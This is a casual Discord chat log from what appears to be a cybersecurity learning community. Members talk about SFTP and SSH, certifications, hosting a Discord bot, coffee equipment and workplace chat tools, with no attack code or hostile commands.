so this video exapmle everything in 44 min?

mossy river
#

No, it explains a basic buffer overflow

slender current
#

k

#

ty

mossy river
#

BoF is a difficult topic :))

clear jackal
rapid merlin
#

im confused

#

is SFTP another name for SSH?

crude stump
#

We canโ€™t help with school exam stuff

rapid merlin
#

no its not a real exam

#

you wouldnt be able to use discord on a real exam

buoyant tree
rapid merlin
#

A+

buoyant tree
#

like http and https

rapid merlin
#

Yea but 22 is SSH so thats weird

#

it would mean that both sftp and ssh run on the same port

buoyant tree
#

SFTP runs over ssh

rapid merlin
#

crazy never heard of two protocols using the same port

crude stump
#

Itโ€™s secure file transfer protocol

buoyant tree
#

probably read this

rapid merlin
#

confusing af

crude stump
#

Basically uses ssh to transfer files securely

#

Ssh Encryption to be exact

jagged moon
#

It's an extension to ssh

blazing granite
rapid merlin
#

thats not whats confusing..

jagged moon
#

So ssh runs on the port

#

But if it's ssh 2.0 it's capable of sftp

rapid merlin
#

yeah thats one of those thing you just have to memorize

proven quartz
#

Yeah the SSH server has all those abilities. It also does scp

stable raft
#

Hello peeps, Anyone willing to give me a 1 year subscription to HTBacademy or THM?

Here's what you'll get in return:

  • A broke uni student's loyalty
  • Experiencing a kid make his parents proud, coz you couldn't make yours proud.
  • Free access to future services.

Here's wht's in for me:

  • I get to utilize my learning ability to soak up all the knowledge available on HTB/ THM
  • Get to make money, and safeguard my future from AI's clutches
  • I get to build a network
  • and Finally have hope & peace in life
jagged moon
#

I'll... Allow

#

Just don't spam it. One is enough

stable raft
#

much appreciated @jagged moon

wide marten
#

You are aware of the THM student subscription?

proven quartz
stable raft
buoyant tree
stable raft
#

noted @proven quartz @buoyant tree

proven quartz
wide marten
#

Waiting for someone to mention avocado toast and starbucks

proven quartz
clear jackal
#

Not exactly a fan of avocado toast myself, and Starbucks is a little expensive for my taste (as I buy "specialty" beans and probably spend the same amount as Starbucks)

wide marten
blazing granite
clear jackal
#

I bought a Baratza Encore and a cheap French Press

wide marten
#

Looking at a La Pavoni Europiccola. Maybe for christmas

clear jackal
#

I've also got a mocha pot

proven quartz
clear jackal
#

And a Ninja Pour-Over/Pod mixed machine

#

Right now the French Press gets used the most

stable raft
twin ridgeBOT
#

Gave +1 Rep to @proven quartz (current: #21 - 380)

blazing granite
clear jackal
#

I need to revisit the moka pot

wide marten
proven quartz
clear jackal
#

I also tried making Turkish coffee in a regular cooking pot, did not go well

blazing granite
#

nothing compare to expresso, but if I have to choose between moka and french press, it's moka all the way

clear jackal
#

I like to have a volume of coffee, so espresso doesn't really do it for me

#

I think I might make decaf right now

blazing granite
clear jackal
#

Yep

proven quartz
clear jackal
#

I tried it in the moka pot first, almost exploded, then tried it in a regular pot

#

It was ground way too fine for the moka pot

blazing granite
dire crane
#

Dlla bsbkfkd Ixafbp xka Dbkqibjxk, f elmb xii lc vlr exa lo x exsfkd x kfzb axv. (c23)

blazing granite
clear jackal
proven quartz
blazing granite
#

for a quick decent expresso I have a nespresso, I'll buy a more professional no automatic machine in the future

#

when I move to an apartment where I can have a water connection for the machine, right now it's too much trouble for a cup of coffee ๐Ÿ˜‚ nespresso it work fine when I want a ristretto ๐Ÿ™‚

proven quartz
blazing granite
valid mauve
#

Okay so Stalker runs perfectly.

proven quartz
valid mauve
#

Issue is now: My Linux partition doesn't recognise its WLAN NIC.

#

"Hardware: Missing".

And I have absolutely fuck-all of an idea.

... Wait a second, I kind of do.

blazing granite
proven quartz
stable raft
simple valve
#

Damn, been binging r/linkedinlunatics posts and they are hella fun

proven quartz
#

Still also, the best place to find jobs for most people

simple valve
proven quartz
gritty fern
#

@mossy river Sorry to disturb but im planning on making a discord bot for my personal server and i was curious what the THM bot is hosted on? Like just a PC running it or a THM server or what?

pallid lotus
twin ridgeBOT
#

Gave +1 Rep to @pallid lotus (current: #9 - 758)

pallid lotus
#

For a personal server I'd suggest you either go for something small on premises (e.g., a raspberry pi / orange pi / etc), or a cheaper cloud provider. Contabo is a decent choice for long term projects, or something like digital ocean for brand recognition.

gritty fern
#

Yeah i cant pay for AWS so i will probably just run it out of my laptop

#

Dont have a pi either

#

I should actually get a pi now that i think about it

whole yew
#

you won't want to run it out of your laptop

#

because the laptop is going to move around, and it oculd break things with the bot if it's disconnected for long periods of time

gritty fern
#

Would a pico work for this particular project or should i get like a Zero?

whole yew
#

Design what you want the bot to do, then spec hardware

#

If you want a database, for instance, you'll need more/faster storage than a pico or zero can likely provide.

late magnet
#

anyone ever thought about setting up honey pots as a way to learn from other hackers?

gritty fern
late magnet
#

I am doing the CEH labs

gritty fern
#

Ah

late magnet
#

been grinding all day super hard

gritty fern
#

Nice

late magnet
#

I could prob make better videos than that guy lol

gritty fern
#

You say that

pallid lotus
gritty fern
#

kek kek

late magnet
#

maybe not as engaging and as fun to watch but more educational

pallid lotus
twin ridgeBOT
#

Gave +1 Rep to @pallid lotus (current: #9 - 759)

late magnet
pallid lotus
gritty fern
pallid lotus
#

Outdated, inaccurate bullshit from a company known for plagiarism and intolerance

pallid lotus
#

That said, since you asked:
OSCP, CRTO, OSEP, OSWE, OSWP

late magnet
#

only doing it because a grant paid for it

gritty fern
pallid lotus
#

It's a HR checkbox, and an outdated one at that. Nothing more.

gritty fern
#

I have a feeling he doesnt fully know what hes talking about lol

late magnet
pallid lotus
#

You get it if you need it for jobs in your area (or if it's free, that works too ๐Ÿคทโ€โ™‚๏ธ), but even then it's a bit of a red flag if they're asking for it.
You get it in the understanding that it's a checkbox, useless for actual learning or demonstration of ability, then move on.

gritty fern
#

What is CEH anyway?

whole yew
#

Not really. Lets ease up on the agressiveness @late magnet

late magnet
#

why isn't OSCP DOD 8570 approved considering it's such a highly regarded cert?

whole yew
#
  1. 8570 has been superceded.
#
  1. US Gov in general is 10 years behind private industry, in terms of qualifications and general 'state of the art'
late magnet
gritty fern
#

10 years?!?! Thats a ridiculous amount of time for anything tech related

whole yew
#

"In general" covers the certification requirements for specific roles.

late magnet
#

any idea how much $$$$$ uncle sam has to spend on hacking?

whole yew
#

There are still supported Windows XP devices in the USG ecosphere.

whole yew
#

No clue, nor do I care how much money the government has spent on hacking.

pallid lotus
gritty fern
#

Didnt that one anti-iranian nuclear refinery worm come out of the US actually?

late magnet
#

maybe some infantry units use old computers to log inventory but I assure you uncle sam pays up for hacking

gritty fern
#

canโ€™t remember the name

pallid lotus
#

Stuxnet

late magnet
#

us/ireal

gritty fern
pallid lotus
#

And yeah, joint collab between US and various other countries iirc

whole yew
late magnet
#

pretty sure they got that president in iran today lol

whole yew
#

We don't talk about politics here

late magnet
#

i wonder how mossad did it . but nice!!

#

sory

whole yew
#

So we can keep it civil

pallid lotus
#

Doesn't surprise me though

gritty fern
#

Politics becomes a heated argument really really quick

whole yew
pallid lotus
#

Wait, what. You're kidding

#

Actually, yeah, that tracks

whole yew
#

I forget the rough number I've heard about how much it costs for that support.... it's exorbitant and mind bottling

pallid lotus
#

Bearing in mind they've also got their own entire instance of AWS deployed lmao

late magnet
gritty fern
#

security by obscurity sort of?

clear jackal
gritty fern
late magnet
#

all sorts of stuff we don't know about

whole yew
#

Remember that Azure won the last round of USG public cloud bids.... so expect that the AWS spend will decrease in the future

whole yew
pallid lotus
#

Oh yay, more MS BS

clear jackal
#

I hate discord

gritty fern
#

Snooze ya loose, google

late magnet
pallid lotus
late magnet
#

1 of the known ones

gritty fern
clear jackal
#

The government also has multiple programs. They don't all have to use AWS or Azure

whole yew
#

Eh, Moosers is one of the few people on the discord I'd consider myself an actual mentor of. kek.

clear jackal
#

Lol

#

And I appreciate it greatly

pallid lotus
gritty fern
whole yew
pallid lotus
#

Gotta be my least favourite type of cloud test.

Oh, this data is going where after leaving this AWS service? Why tf is it appearing in Azure.

pallid lotus
whole yew
#

I'm kind of glad the company I work for hosts our own public cloud - it gives me great opportunities to ask uncomfortable questions about why we aren't dogfooding our cloud when devs pitch new products they want to integrate

gritty fern
#

whats dogfooding?

clear jackal
#

All I'm going to say is that I had a call the other day and the first 5 minutes was "you're doing what with our product?"

late magnet
whole yew
clear jackal
#

And then it's the first time I've heard "I don't know if this is feasible for us" from a vendor on basically a blank check program

gritty fern
twin ridgeBOT
#

Gave +1 Rep to @whole yew (current: #10 - 750)

wooden totem
#

I just realized I was playing chess for 2 hours more than I had time to

#

it is now 5am

gritty fern
#

5am?!

wooden totem
#

yes in the morning

gritty fern
#

you were planning on playing chess until 3am?!

pallid lotus
wooden totem
pallid lotus
#

No way they use teams internally.

clear jackal
#

Definitely not

whole yew
gritty fern
#

MS teams is so bad bro

whole yew
#

Microsoft culture is heavily dogfood

clear jackal
#

I'm pretty sure the S/MIME implementation is still broken on O365 for web

wooden totem
whole yew
#

That's a huge mistake

gritty fern
#

Using teams was torture for 8th grade

clear jackal
#

It's been 4 years

pallid lotus
#

Juuuuuuuust like the rest of us kekw

whole yew
#

using discord for corpo enterprise stuff is not acceptable from an infosec perspective - too much potential for data leakage

gritty fern
#

Yeah there was just that scraper or whatever

clear jackal
#

And you know, the China connection

pallid lotus
#

Rocketchat ftw

wooden totem
clear jackal
#

KEKW rocketchat

gritty fern
#

Ah

whole yew
clear jackal
#

I would hate you too

pallid lotus
#

Lmfao

clear jackal
#

When I see zoom I start to get a little panicky

whole yew
#

If they want me to be able to evaluate their sales pitch, they need to not use teams for me..... it's very simple

wooden totem
#

Who is lmfao, he's a chinese hacker isn't he?

whole yew
#

it's ayyy le mao's older brother

pallid lotus
#

Acronym:
Laughing my fucking arse off.

gritty fern
#

Arse? never heard that before..

pallid lotus
#

You've never been to Scotland kekw

gritty fern
#

RAAHHH AMERICA

clear jackal
gritty fern
#

kek kek

whole yew
#

Just examine the permissions teams needs to function, the domains it needs to connect do, and what security settings you can enhance in your browser.

gritty fern
#

I think its finals week this week

#

Or next week

#

one of the two

molten sky
#

o/

gritty fern
#

bash: o/: No such file or directory

#

That would actually be a fun idea for a discord bot, you have to use shell commands to send messages and media

molten sky
#

people have written bots to run shell commands in the past

#

i wouldn't wanna deal with that mess tho

gritty fern
gritty fern
#

Reading terminal output is really easy with C++

#

Oh wait maybe this is pretty hard now that ive given it more thought

#

Bro the newest iOS update stops my music when i render an image what

rapid merlin
#

finally back on grind.

gray sonnet
#

yo @molten sky mind if I DM?

#

get a THM subscription

torpid aspen
#

Which coding language to choose for starter in security and hacking as of now ๐Ÿค”